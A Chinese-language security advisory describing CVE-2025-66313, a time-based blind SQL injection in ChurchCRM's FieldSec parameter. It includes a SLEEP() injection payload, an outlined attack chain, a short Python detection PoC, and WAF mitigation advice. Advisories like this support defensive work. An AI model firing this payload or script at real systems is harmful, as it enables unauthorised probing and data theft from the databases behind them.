CVE-2025-66313 CVSS 7.2 高危

CVE-2025-66313: ChurchCRM 6.2.0及更早版本盲注SQL注入漏洞

披露日期: 2025-12-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-66313

漏洞类型

SQL注入

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

ChurchCRM

漏洞概述

ChurchCRM是一个开源教会管理系统。在6.2.0及更早版本中，存在基于时间的盲注SQL注入漏洞。攻击者通过在FieldSec参数中注入恶意SQL代码（如SLEEP()函数），可以触发数据库延迟响应，从而验证注入成功。此漏洞允许未经授权的攻击者在拥有高权限的情况下，通过盲注技术窃取敏感数据库信息或修改数据内容。CVSS评分7.2，属于高危漏洞。

技术细节

漏洞根源在于ChurchCRM对用户输入的FieldSec参数缺乏充分的输入验证和参数化查询。攻击者可在该参数中构造包含SLEEP()函数的SQL语句，如FieldSec=1' AND SLEEP(5)--，由于参数值被直接拼接到SQL查询中而非使用参数化查询，数据库会执行SLEEP()函数导致响应延迟。攻击者通过测量响应时间判断注入是否成功，进而利用条件语句（如IF()）和SLEEP()函数进行布尔盲注或时间盲注攻击，逐步提取数据库中的敏感信息。

攻击链分析

STEP 1

步骤1：侦察与信息收集

攻击者识别目标系统使用ChurchCRM，并确定存在可访问的FieldSec参数

STEP 2

步骤2：构造恶意Payload

攻击者构造包含SLEEP()函数的SQL注入Payload

STEP 3

步骤3：验证注入点

通过观察响应时间延迟确认漏洞存在

STEP 4

步骤4：提取数据

利用时间盲注技术逐步提取数据库中的敏感信息

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
import requests
import time

target_url = input('Enter target URL: ')
payload = "1' AND SLEEP(5)-- "
start = time.time()
response = requests.get(f'{target_url}?FieldSec={payload}')
elapsed = time.time() - start

if elapsed > 4:
    print('Blind SQL injection confirmed!')
else:
    print('No vulnerability detected.')

影响范围

ChurchCRM <= 6.2.0

防御指南

临时缓解措施

在官方修复版本发布前，可通过部署WAF规则限制包含SLEEP()、BENCHMARK()等时间函数的请求，或临时禁用受影响的功能模块。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表